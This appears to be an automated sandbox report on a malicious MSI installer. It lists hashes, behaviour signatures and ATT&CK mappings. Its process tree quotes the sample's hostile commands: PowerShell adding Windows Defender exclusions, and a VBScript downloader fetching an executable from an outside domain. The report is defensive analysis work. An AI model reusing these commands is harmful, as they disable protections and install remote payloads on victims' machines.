Analysis
- Max time kernel: 117s
- Max time network: 122s
- Platform: windows7_x64
- Resource: win7-20240903-en
- Resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- Submitted: 14/09/2024, 08:11
Static task: static1
Behavioral task: behavioral1
- Sample: zuixinaisi.msi
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: zuixinaisi.msi
- Resource: win10v2004-20240802-en
General
- Target: zuixinaisi.msi
- Size: 233.8MB
- MD5: df0ddca33d18cef60dbfdad992a21ff3
- SHA1: 5db0a225c9713d93412d01c5df5398811e54d1e5
- SHA256: 8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b
- SHA512: e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda
- SSDEEP: 6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow 3: PID 1664 WScript.exe
  flow 4: PID 1664 WScript.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  PID 2848 powershell.exe; PID 2896 powershell.exe
- Enumerates connected drives (3 TTPs, 46 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
- Drops file in Windows directory (14 IoCs)
- Executes dropped EXE (1 IoC)
  PID 2736 MSI90A.tmp
- Loads dropped DLL (3 IoCs)
  PID 1688 MsiExec.exe; PID 1688 MsiExec.exe; PID 1688 MsiExec.exe
- Access Token Manipulation: Create Process with Token (1 TTP, 1 IoC)
  PID 2736 MSI90A.tmp
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Installer Packages (2 TTPs, 1 IoC)
  PID 1352 msiexec.exe
- System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Modifies data under HKEY_USERS (46 IoCs)
- Modifies registry class (23 IoCs)
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  PID 2288 msiexec.exe; PID 2288 msiexec.exe; PID 2848 powershell.exe; PID 2896 powershell.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 1396 cmd.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of FindShellTrayWindow (2 IoCs)
  PID 1352 msiexec.exe; PID 1352 msiexec.exe
- Suspicious use of WriteProcessMemory (30 IoCs)
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (nesting shows parent/child relationship)
- C:\Windows\system32\msiexec.exe (PID 1352)
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi
  - Enumerates connected drives
  - Event Triggered Execution: Installer Packages
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
- C:\Windows\system32\msiexec.exe (PID 2288)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\syswow64\MsiExec.exe (PID 1688)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding AD8581B124C124DB56D9C7C26E5E0FD4
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
  - C:\Windows\Installer\MSI90A.tmp (PID 2736)
    Command line: "C:\Windows\Installer\MSI90A.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"
    - Executes dropped EXE
    - Access Token Manipulation: Create Process with Token
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 1396)
      Command line: "C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2848)
        Command line: powershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2896)
        Command line: powershell Add-MpPreference -ExclusionPath "C:\ProgramData
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
      - C:\Windows\SysWOW64\WScript.exe (PID 1664)
        Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"
        - Blocklisted process makes network request
        - System Location Discovery: System Language Discovery
- C:\Windows\system32\vssvc.exe (PID 2356)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\DrvInst.exe (PID 2832)
  Command line: DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000005C" "0000000000000498"
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Access Token Manipulation (1): Create Process with Token (1)
- Event Triggered Execution (1): Installer Packages (1)
Defense Evasion
- Access Token Manipulation (1): Create Process with Token (1)
- System Binary Proxy Execution (1): Msiexec (1)
Downloads